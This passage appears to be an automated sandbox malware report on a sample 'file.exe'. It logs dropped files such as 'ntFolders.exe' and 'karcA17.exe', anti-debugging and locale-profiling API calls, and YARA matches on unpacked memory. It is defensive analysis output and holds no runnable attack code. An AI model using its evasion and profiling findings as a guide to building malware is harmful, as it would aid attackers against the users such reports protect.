Code function: 1_2_0040A257 push ds; ret |
1_2_0040A258 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00478210 push 004782BBh; ret |
1_2_004782B3 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040A22B push ds; ret |
1_2_0040A255 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax |
1_2_004063C9 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax |
1_2_004303A9 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax |
1_2_0045A751 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx |
1_2_004108ED |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00412B40 push 00412BA3h; ret |
1_2_00412B9B |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00450FF8 push 0045102Bh; ret |
1_2_00451023 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx |
1_2_0040D242 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004055BD push eax; ret |
1_2_004055F9 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx |
1_2_00443664 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040568D push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx |
1_2_0047976D |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040570E push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004057F0 push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040578B push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx |
1_2_0040F7A2 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx |
1_2_00419E45 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004311AD push esi; ret |
2_2_004311B6 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040F4BB push ecx; ret |
2_2_0040F4CE |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\is-K96P8.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_iscrypt.dll |
Jump to dropped file |
Source: C:\Users\user\Desktop\file.exe |
File created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
1_2_00423E24 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
1_2_00423E24 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus, |
1_2_004243F4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004243AC IsIconic,SetActiveWindow, |
1_2_004243AC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, |
1_2_0041859C |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, |
1_2_00422A74 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004177B0 IsIconic,GetCapture, |
1_2_004177B0 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, |
1_2_00477D2C |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00417EE6 IsIconic,SetWindowPos, |
1_2_00417EE6 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, |
1_2_00417EE8 |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-K96P8.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0046C770 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_00474708 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
1_2_00451554 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose, |
1_2_0048A778 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_004729D4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0045CA54 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
1_2_00406FEC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DB60 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DEF4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00423E2D FindFirstFileExW, |
2_2_00423E2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000959D FindFirstFileExW, |
2_2_1000959D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
2_2_0044028F |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] |
2_2_0042041F |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] |
2_2_004429E7 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] |
2_2_00417BAF |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] |
2_2_100091C7 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] |
2_2_10006CE1 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040F789 SetUnhandledExceptionFilter, |
2_2_0040F789 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_0041336B |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_0040F5F5 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
2_2_0040EBD2 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_10006180 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
2_2_100035DF |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_10003AD4 |
Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: Program Manager |
Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: F.program managerv |
Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: program manager |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoA, |
0_2_004051C8 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoA, |
0_2_00405214 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: GetLocaleInfoA, |
1_2_0040874C |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: GetLocaleInfoA, |
1_2_00408798 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
2_2_00404D40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_00427041 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_0042708C |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_00427127 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
2_2_004271B2 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_0041E2FF |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW, |
2_2_00427405 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
2_2_0042752B |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW, |
2_2_00427631 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
2_2_00427700 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW, |
2_2_0041E821 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
2_2_00426D9F |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |